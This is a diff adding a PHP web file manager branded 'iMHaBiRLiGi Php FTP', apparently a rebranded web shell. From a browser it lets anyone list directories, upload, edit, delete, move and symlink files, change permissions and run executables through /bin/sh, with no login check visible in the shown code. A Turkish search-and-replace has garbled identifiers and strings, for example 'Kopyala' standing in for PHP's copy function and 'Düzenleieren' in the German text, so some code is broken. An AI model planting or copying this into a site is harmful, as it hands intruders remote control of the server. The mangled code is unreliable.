+		if (sizeof($failure) > 0) {
+			$message = error('not_Tasid', implode("\n", $failure), $dest);
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('Tasid', implode("\n", $success), $dest);
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('Tasi_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('Tasi') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Kopyala':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (@is_dir($dest)) {
+
+			$failure = array();
+			$success = array();
+
+			foreach ($files as $file) {
+				$filename = substr($file, strlen($directory));
+				$d = addslash($dest) . $filename;
+				if (!@is_dir($file) && !@file_exists($d) && @Kopyala($file, $d)) {
+					$success[] = $file;
+				} else {
+					$failure[] = $file;
+				}
+			}
+
+			$message = '';
+			if (sizeof($failure) > 0) {
+				$message = error('not_copied', implode("\n", $failure), $dest);
+			}
+			if (sizeof($success) > 0) {
+				$message .= notice('copied', implode("\n", $success), $dest);
+			}
+
+			listing_page($message);
+
+		} else {
+
+			if (!@file_exists($dest) && @Kopyala($file, $dest)) {
+				listing_page(notice('copied', $file, $dest));
+			} else {
+				listing_page(error('not_copied', $file, $dest));
+			}
+
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\n<b>" . word('Kopyala_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('Kopyala') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'create_symlink':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
+
+		if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
+
+		if (!@file_exists($dest) && @symlink($file, $dest)) {
+			listing_page(notice('symlinked', $file, $dest));
+		} else {
+			listing_page(error('not_symlinked', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog" id="symlink">
+<tr>
+	<td style="vertical-align: top">' . word('Yol') . ': </td>
+	<td>
+		<b>' . html($file) . '</b><br />
+		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
+		<label for="checkbox_relative">' . word('relative') . '</label>
+		<input type="hidden" name="action" value="create_symlink" />
+		<input type="hidden" name="file" value="' . html($file) . '" />
+		<input type="hidden" name="dir" value="' . html($directory) . '" />
+	</td>
+</tr>
+<tr>
+	<td>' . word('symlink') . ': </td>
+	<td>
+		<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+		<input type="submit" value="' . word('create_symlink') . '" />
+	</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Düzenle':
+
+	if (!empty($_POST['save'])) {
+
+		$content = str_replace("\r\n", "\n", $_POST['content']);
+
+		if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
+			listing_page(notice('saved', $file));
+		} else {
+			listing_page(error('not_saved', $file));
+		}
+
+	} else {
+
+		if (@is_readable($file) && @is_writable($file)) {
+			Düzenle($file);
+		} else {
+			listing_page(error('not_Düzenleed', $file));
+		}
+
+	}
+
+	break;
+
+case 'permission':
+
+	if (!empty($_POST['set'])) {
+
+		$mode = 0;
+		if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
+		if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
+		if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
+
+		if (@chmod($file, $mode)) {
+			listing_page(notice('permission_set', $file, decoct($mode)));
+		} else {
+			listing_page(error('permission_not_set', $file, decoct($mode)));
+		}
+
+	} else {
+
+		html_header();
+
+		$mode = fileperms($file);
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
+
+	<hr />
+
+	<table id="permission">
+	<tr>
+		<td></td>
+		<td style="border-right: 1px solid black">' . word('owner') . '</td>
+		<td style="border-right: 1px solid black">' . word('group') . '</td>
+		<td>' . word('other') . '</td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('read') . ':</td>
+		<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('write') . ':</td>
+		<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('execute') . ':</td>
+		<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	</table>
+
+	<hr />
+
+	<input type="submit" name="set" value="' . word('set') . '" />
+
+	<input type="hidden" name="action" value="permission" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+default:
+
+	listing_page();
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function getlist ($directory) {
+	global $delim, $win;
+
+	if ($d = @opendir($directory)) {
+
+		while (($filename = @readdir($d)) !== false) {
+
+			$path = $directory . $filename;
+
+			if ($stat = @lstat($path)) {
+
+				$file = array(
+					'filename'    => $filename,
+					'path'        => $path,
+					'is_file'     => @is_file($path),
+					'is_dir'      => @is_dir($path),
+					'is_link'     => @is_link($path),
+					'is_readable' => @is_readable($path),
+					'is_writable' => @is_writable($path),
+					'size'        => $stat['size'],
+					'permission'  => $stat['mode'],
+					'owner'       => $stat['uid'],
+					'group'       => $stat['gid'],
+					'mtime'       => @filemtime($path),
+					'atime'       => @fileatime($path),
+					'ctime'       => @filectime($path)
+				);
+
+				if ($file['is_dir']) {
+					$file['is_executable'] = @file_exists($path . $delim . '.');
+				} else {
+					if (!$win) {
+						$file['is_executable'] = @is_executable($path);
+					} else {
+						$file['is_executable'] = true;
+					}
+				}
+
+				if ($file['is_link']) $file['target'] = @readlink($path);
+
+				if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
+				if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
+
+				$files[] = $file;
+
+			}
+
+		}
+
+		return $files;
+
+	} else {
+		return false;
+	}
+
+}
+
+function sortlist (&$list, $key, $reverse) {
+
+	quicksort($list, 0, sizeof($list) - 1, $key);
+
+	if ($reverse) $list = array_reverse($list);
+
+}
+
+function quicksort (&$array, $first, $last, $key) {
+
+	if ($first < $last) {
+
+		$cmp = $array[floor(($first + $last) / 2)][$key];
+
+		$l = $first;
+		$r = $last;
+
+		while ($l <= $r) {
+
+			while ($array[$l][$key] < $cmp) $l++;
+			while ($array[$r][$key] > $cmp) $r--;
+
+			if ($l <= $r) {
+
+				$tmp = $array[$l];
+				$array[$l] = $array[$r];
+				$array[$r] = $tmp;
+
+				$l++;
+				$r--;
+
+			}
+
+		}
+
+		quicksort($array, $first, $r, $key);
+		quicksort($array, $l, $last, $key);
+
+	}
+
+}
+
+function permission_octal2string ($mode) {
+
+	if (($mode & 0xC000) === 0xC000) {
+		$type = 's';
+	} elseif (($mode & 0xA000) === 0xA000) {
+		$type = 'l';
+	} elseif (($mode & 0x8000) === 0x8000) {
+		$type = '-';
+	} elseif (($mode & 0x6000) === 0x6000) {
+		$type = 'b';
+	} elseif (($mode & 0x4000) === 0x4000) {
+		$type = 'd';
+	} elseif (($mode & 0x2000) === 0x2000) {
+		$type = 'c';
+	} elseif (($mode & 0x1000) === 0x1000) {
+		$type = 'p';
+	} else {
+		$type = '?';
+	}
+
+	$owner  = ($mode & 00400) ? 'r' : '-';
+	$owner .= ($mode & 00200) ? 'w' : '-';
+	if ($mode & 0x800) {
+		$owner .= ($mode & 00100) ? 's' : 'S';
+	} else {
+		$owner .= ($mode & 00100) ? 'x' : '-';
+	}
+
+	$group  = ($mode & 00040) ? 'r' : '-';
+	$group .= ($mode & 00020) ? 'w' : '-';
+	if ($mode & 0x400) {
+		$group .= ($mode & 00010) ? 's' : 'S';
+	} else {
+		$group .= ($mode & 00010) ? 'x' : '-';
+	}
+
+	$other  = ($mode & 00004) ? 'r' : '-';
+	$other .= ($mode & 00002) ? 'w' : '-';
+	if ($mode & 0x200) {
+		$other .= ($mode & 00001) ? 't' : 'T';
+	} else {
+		$other .= ($mode & 00001) ? 'x' : '-';
+	}
+
+	return $type . $owner . $group . $other;
+
+}
+
+function is_script ($filename) {
+	return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
+}
+
+function getmimetype ($filename) {
+	static $mimes = array(
+		'\.jpg$|\.jpeg$'  => 'image/jpeg',
+		'\.gif$'          => 'image/gif',
+		'\.png$'          => 'image/png',
+		'\.html$|\.html$' => 'text/html',
+		'\.txt$|\.asc$'   => 'text/plain',
+		'\.xml$|\.xsl$'   => 'application/xml',
+		'\.pdf$'          => 'application/pdf'
+	);
+
+	foreach ($mimes as $regex => $mime) {
+		if (eregi($regex, $filename)) return $mime;
+	}
+
+	// return 'application/octet-stream';
+	return 'text/plain';
+
+}
+
+function del ($file) {
+	global $delim;
+
+	if (!@is_link($file) && !file_exists($file)) return false;
+
+	if (!@is_link($file) && @is_dir($file)) {
+
+		if ($dir = @opendir($file)) {
+
+			$error = false;
+
+			while (($f = readdir($dir)) !== false) {
+				if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
+					$error = true;
+				}
+			}
+			closedir($dir);
+
+			if (!$error) return @rmdir($file);
+
+			return !$error;
+
+		} else {
+			return false;
+		}
+
+	} else {
+		return @unlink($file);
+	}
+
+}
+
+function addslash ($directory) {
+	global $delim;
+
+	if (substr($directory, -1, 1) != $delim) {
+		return $directory . $delim;
+	} else {
+		return $directory;
+	}
+
+}
+
+function relative2absolute ($string, $directory) {
+
+	if (path_is_relative($string)) {
+		return simplify_path(addslash($directory) . $string);
+	} else {
+		return simplify_path($string);
+	}
+
+}
+
+function path_is_relative ($path) {
+	global $win;
+
+	if ($win) {
+		return (substr($path, 1, 1) != ':');
+	} else {
+		return (substr($path, 0, 1) != '/');
+	}
+
+}
+
+function absolute2relative ($directory, $target) {
+	global $delim;
+
+	$path = '';
+	while ($directory != $target) {
+		if ($directory == substr($target, 0, strlen($directory))) {
+			$path .= substr($target, strlen($directory));
+			break;
+		} else {
+			$path .= '..' . $delim;
+			$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
+		}
+	}
+	if ($path == '') $path = '.';
+
+	return $path;
+
+}
+
+function simplify_path ($path) {
+	global $delim;
+
+	if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
+		$path = realpath($path);
+		if (@is_dir($path)) {
+			return addslash($path);
+		} else {
+			return $path;
+		}
+	}
+
+	$pattern  = $delim . '.' . $delim;
+
+	if (@is_dir($path)) {
+		$path = addslash($path);
+	}
+
+	while (strpos($path, $pattern) !== false) {
+		$path = str_replace($pattern, $delim, $path);
+	}
+
+	$e = addslashes($delim);
+	$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
+
+	while (ereg($regex, $path)) {
+		$path = ereg_replace($regex, $delim, $path);
+	}
+	
+	return $path;
+
+}
+
+function human_filesize ($filesize) {
+
+	$suffices = 'kMGTPE';
+
+	$n = 0;
+	while ($filesize >= 1000) {
+		$filesize /= 1024;
+		$n++;
+	}
+
+	$filesize = round($filesize, 3 - strpos($filesize, '.'));
+
+	if (strpos($filesize, '.') !== false) {
+		while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
+			$filesize = substr($filesize, 0, strlen($filesize) - 1);
+		}
+	}
+
+	$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
+
+	return $filesize . " {$suffix}B";
+
+}
+
+function strip (&$str) {
+	$str = stripslashes($str);
+}
+
+/* ------------------------------------------------------------------------- */
+
+function listing_page ($message = null) {
+	global $self, $directory, $sort, $reverse;
+
+	html_header();
+
+	$list = getlist($directory);
+
+	if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
+	if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
+
+	sortlist($list, $sort, $reverse);
+
+	echo '<h1 style="margin-bottom: 0">iMHaBiRLiGi Php FTP</h1>
+
+<form enctype="multipart/form-data" action="' . $self . '" method="post">
+
+<table id="main">
+';
+
+	directory_choice();
+
+	if (!empty($message)) {
+		spacer();
+		echo $message;
+	}
+
+	if (@is_writable($directory)) {
+		upload_box();
+		create_box();
+	} else {
+		spacer();
+	}
+
+	if ($list) {
+		listing($list);
+	} else {
+		echo error('not_readable', $directory);
+	}
+
+	echo '</table>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function listing ($list) {
+	global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
+
+	echo '<tr class="listing">
+	<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
+';
+
+	$d = 'dir=' . urlencode($directory) . '&amp;';
+
+	if (!$reverse && $sort == 'filename') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
+
+	if (!$reverse && $sort == 'size') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
+
+	if (!$win) {
+
+		if (!$reverse && $sort == 'permission') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'owner') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'group') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
+
+	}
+
+	echo '	<th class="Görevler">' . word('Görevler') . '</th>
+</tr>
+';
+
+	for ($i = 0; $i < sizeof($list); $i++) {
+		$file = $list[$i];
+
+		$timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
+		$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
+		$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
+
+		echo '<tr class="listing">
+	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
+	<td class="filename" title="' . html($timestamps) . '">';
+
+		if ($file['is_link']) {
+
+			echo '<img src="' . $self . '?image=link" alt="link" /> ';
+			echo html($file['filename']) . ' &rarr; ';
+
+			$real_file = relative2absolute($file['target'], $directory);
+
+			if (@is_readable($real_file)) {
+				if (@is_dir($real_file)) {
+					echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
+				} else {
+					echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
+				}
+			} else {
+				echo html($file['target']);
+			}
+
+		} elseif ($file['is_dir']) {
+
+			echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
+			if ($win || $file['is_executable']) {
+				echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+			echo ' ]';
+
+		} else {
+
+			if (substr($file['filename'], 0, 1) == '.') {
+				echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
+			} else {
+				echo '<img src="' . $self . '?image=file" alt="file" /> ';
+			}
+
+			if ($file['is_file'] && $file['is_readable']) {
+			   echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+
+		}
+
+		if ($file['size'] >= 1000) {
+			$human = ' title="' . human_filesize($file['size']) . '"';
+		} else {
+			$human = '';
+		}
+
+		echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
+
+		if (!$win) {
+
+			echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
+
+			$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
+			if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
+			echo html(permission_octal2string($file['permission']));
+			if ($l) echo '</a>';
+
+			echo "</td>\n";
+
+			if (array_key_exists('owner_name', $file)) {
+				echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
+			}
+
+			if (array_key_exists('group_name', $file)) {
+				echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"group\">{$file['group']}</td>\n";
+			}
+
+		}
+
+		echo '	<td class="Görevler">
+		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
+';
+
+		$actions = array();
+		if (function_exists('symlink')) {
+			$actions[] = 'create_symlink';
+		}
+		if (@is_writable(dirname($file['path']))) {
+			$actions[] = 'Sil';
+			$actions[] = 'Degistir';
+			$actions[] = 'Tasi';
+		}
+		if ($file['is_file'] && $file['is_readable']) {
+			$actions[] = 'Kopyala';
+			$actions[] = 'indir';
+			if ($file['is_writable']) $actions[] = 'Düzenle';
+		}
+		if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
+			$actions[] = 'execute';
+		}
+
+		if (sizeof($actions) > 0) {
+
+			echo '		<select class="small" name="action' . $i . '" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+			foreach ($actions as $action) {
+				echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+			}
+
+			echo '		</select>
+		<input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
+';
+
+		}
+
+		echo '	</td>
+</tr>
+';
+
+	}
+
+	echo '<tr class="listing_footer">
+	<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
+	<td colspan="' . ($cols - 1) . '">
+		<input type="hidden" name="num" value="' . sizeof($list) . '" />
+		<input type="hidden" name="focus" value="" />
+		<input type="hidden" name="olddir" value="' . html($directory) . '" />
+';
+
+	$actions = array();
+	if (@is_writable(dirname($file['path']))) {
+		$actions[] = 'Sil';
+		$actions[] = 'Tasi';
+	}
+	$actions[] = 'Kopyala';
+
+	echo '		<select class="small" name="action_all" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+	foreach ($actions as $action) {
+		echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+	}
+
+	echo '		</select>
+		<input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function directory_choice () {
+	global $directory, $homedir, $cols, $self;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="directory">
+		<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
+		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
+		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
+	</td>
+</tr>
+';
+
+}
+
+function upload_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="upload">
+		' . word('file') . ':
+		<input type="file" name="upload" onfocus="activate(\'other\')" />
+		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function create_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="create">
+		<select name="create_type" size="1" onfocus="activate(\'create\')">
+		<option value="file">' . word('file') . '</option>
+		<option value="directory">' . word('directory') . '</option>
+		</select>
+		<input type="text" name="create_name" onfocus="activate(\'create\')" />
+		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
+	</td>
+</tr>
+';
+
+}
+
+function Düzenle ($file) {
+	global $self, $directory, $Düzenlecols, $Düzenlerows, $apache, $htpasswd, $htaccess;
+
+	html_header();
+
+	echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
+
+<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<textarea name="content" cols="' . $Düzenlecols . '" rows="' . $Düzenlerows . '" WRAP="off">';
+
+	if (array_key_exists('content', $_POST)) {
+		echo $_POST['content'];
+	} else {
+		$f = fopen($file, 'r');
+		while (!feof($f)) {
+			echo html(fread($f, 8192));
+		}
+		fclose($f);
+	}
+
+	if (!empty($_POST['user'])) {
+		echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
+	}
+	if (!empty($_POST['basic_auth'])) {
+		if ($win) {
+			$authfile = str_replace('\\', '/', $directory) . $htpasswd;
+		} else {
+			$authfile = $directory . $htpasswd;
+		}
+		echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
+		echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
+		echo 'Require valid-user';
+	}
+
+	echo '</textarea>
+
+	<hr />
+';
+
+	if ($apache && basename($file) == $htpasswd) {
+		echo '
+	' . word('user') . ': <input type="text" name="user" />
+	' . word('password') . ': <input type="password" name="password" />
+	<input type="submit" value="' . word('add') . '" />
+
+	<hr />
+';
+
+	}
+
+	if ($apache && basename($file) == $htaccess) {
+		echo '
+	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
+
+	<hr />
+';
+
+	}
+
+	echo '
+	<input type="hidden" name="action" value="Düzenle" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<input type="reset" value="' . word('reset') . '" id="red_button" />
+	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function spacer () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" style="height: 1em"></td>
+</tr>
+';
+
+}
+
+function textfieldsize ($content) {
+
+	$size = strlen($content) + 5;
+	if ($size < 30) $size = 30;
+
+	return $size;
+
+}
+
+function request_dump () {
+
+	foreach ($_REQUEST as $key => $value) {
+		echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
+	}
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function html ($string) {
+	global $charset;
+	return htmlentities($string, ENT_COMPAT, $charset);
+}
+
+function word ($word) {
+	global $words, $word_charset;
+	return htmlentities($words[$word], ENT_COMPAT, $word_charset);
+}
+
+function phrase ($phrase, $arguments) {
+	global $words;
+	static $search;
+
+	if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
+
+	for ($i = 0; $i < sizeof($arguments); $i++) {
+		$arguments[$i] = nl2br(html($arguments[$i]));
+	}
+
+	$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
+
+	return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
+
+}
+
+function getwords ($lang) {
+	global $word_charset, $date_format;
+
+	switch ($lang) {
+	case 'de':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Verzeichnis',
+'file' => 'Datei',
+'filename' => 'Dateiname',
+
+'size' => 'Größe',
+'permission' => 'Rechte',
+'owner' => 'Eigner',
+'group' => 'Gruppe',
+'other' => 'Andere',
+'Görevler' => 'Funktionen',
+
+'read' => 'lesen',
+'write' => 'schreiben',
+'execute' => 'ausführen',
+
+'create_symlink' => 'Symlink erstellen',
+'Sil' => 'löschen',
+'Degistir' => 'umbenennen',
+'Tasi' => 'verschieben',
+'Kopyala' => 'kopieren',
+'Düzenle' => 'Düzenleieren',
+'indir' => 'herunterladen',
+'upload' => 'hochladen',
+'create' => 'erstellen',
+'change' => 'wechseln',
+'save' => 'speichern',
+'set' => 'setze',
+'reset' => 'zurücksetzen',
+'relative' => 'Pfad zum Ziel relativ',
+
+'yes' => 'Ja',
+'no' => 'Nein',
+'Geri' => 'zurück',
+'Yol' => 'Ziel',
+'symlink' => 'Symbolischer Link',
+'no_output' => 'keine Ausgabe',
+
+'user' => 'Benutzername',
+'password' => 'Kennwort',
+'add' => 'hinzufügen',
+'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen',
+
+'uploaded' => '"[%1]" wurde hochgeladen.',
+'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
+'already_exists' => '"[%1]" existiert bereits.',
+'created' => '"[%1]" wurde erstellt.',
+'not_created' => '"[%1]" konnte nicht erstellt werden.',
+'really_Sil' => 'Sollen folgende Dateien wirklich gelöscht werden?',
+'Sild' => "Folgende Dateien wurden gelöscht:\n[%1]",
+'not_Sild' => "Folgende Dateien konnten nicht gelöscht werden:\n[%1]",
+'Degistir_file' => 'Benenne Datei um:',
+'Degistird' => '"[%1]" wurde in "[%2]" umbenannt.',
+'not_Degistird' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
+'Tasi_files' => 'Verschieben folgende Dateien:',
+'Tasid' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
+'not_Tasid' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
+'Kopyala_files' => 'Kopiere folgende Dateien:',
+'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
+'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
+'not_Düzenleed' => '"[%1]" kann nicht Düzenleiert werden.',
+'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}",
+'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}",
+'saved' => '"[%1]" wurde gespeichert.',
+'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
+'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
+'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
+'permission_for' => 'Rechte für "[%1]":',
+'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.',
+'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.',
+'not_readable' => '"[%1]" kann nicht gelesen werden.'
+		);
+
+	case 'fr':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Répertoire',
+'file' => 'Fichier',
+'filename' => 'Nom fichier',
+
+'size' => 'Taille',
+'permission' => 'Droits',
+'owner' => 'Propriétaire',
+'group' => 'Groupe',
+'other' => 'Autres',
+'Görevler' => 'Fonctions',
+
+'read' => 'Lire',
+'write' => 'Ecrire',
+'execute' => 'Exécuter',
+
